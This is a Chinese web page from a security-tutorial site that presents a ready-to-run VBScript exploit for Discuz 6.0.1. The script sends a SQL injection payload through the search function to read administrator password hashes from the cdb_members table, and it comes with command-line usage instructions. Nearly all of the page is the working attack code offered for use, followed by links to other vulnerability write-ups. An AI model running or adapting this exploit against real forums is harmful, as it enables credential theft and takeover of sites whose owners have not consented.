手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >discuz获取任意管理员密码漏洞利用工具vbs版
discuz获取任意管理员密码漏洞利用工具vbs版
摘要:以下是search.inc.php文件漏洞利用代码VBS版复制代码代码如下:DimstrUrl,strSite,strPath,strUid...

以下是search.inc.php 文件漏洞利用代码VBS版

复制代码代码如下:

Dim strUrl,strSite,strPath,strUid

showB()

Set Args = Wscript.Arguments

If Args.Count <> 3 Then

ShowU()

Else

strSite=Args(0)

strPath=Args(1)

strUid=Args(2)

End If

strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"

Set objXML = CreateObject("Microsoft.XMLHTTP")

objXML.Open "POST",strSite & strPath & "index.php", False

objXML.SetRequestHeader "Accept", "*/*"

objXML.SetRequestHeader "Accept-Language", "zh-cn"

objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"

objXML.SetRequestHeader "User-Agent", "wap"

objXML.send(strUrl)

wscript.echo(objXML.ResponseText)

Sub showB()

With Wscript

.Echo("+--------------------------=====================------------------------------+")

.Echo("Exploit discuz6.0.1")

.Echo("Code By Safe3")

.Echo("+--------------------------=====================------------------------------+")

End with

End Sub

Sub showU()

With Wscript

.Echo("+--------------------------=====================------------------------------+")

.Echo("用法:")

.Echo(" cscript "&.ScriptName&" site path uid")

.Echo("例子:")

.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")

.Echo("+--------------------------=====================------------------------------+")

.Quit

End with

End Sub

获得的密码大家自己在result.txt中查找

【discuz获取任意管理员密码漏洞利用工具vbs版】相关文章:

Foxit Reader PDF文件解析内存破坏漏洞

Zblog最新跨站漏洞及利用代码

FeiXun企业网站管理系统v2011上传漏洞通杀0day及

Windows DNS客户端可预测事件处理ID漏洞

hzhost虚拟主机系统致命漏洞

讯时后台管理系统v4.9的鸡肋漏洞分析

Discuz! wap功能模块编码的注射漏洞

KindEditor上传解析漏洞、列目录、内容漏洞

Microsoft IE 脚本错误处理内存破坏漏洞

Discuz论坛短消息未限制发送次数漏洞

精品推荐
分类导航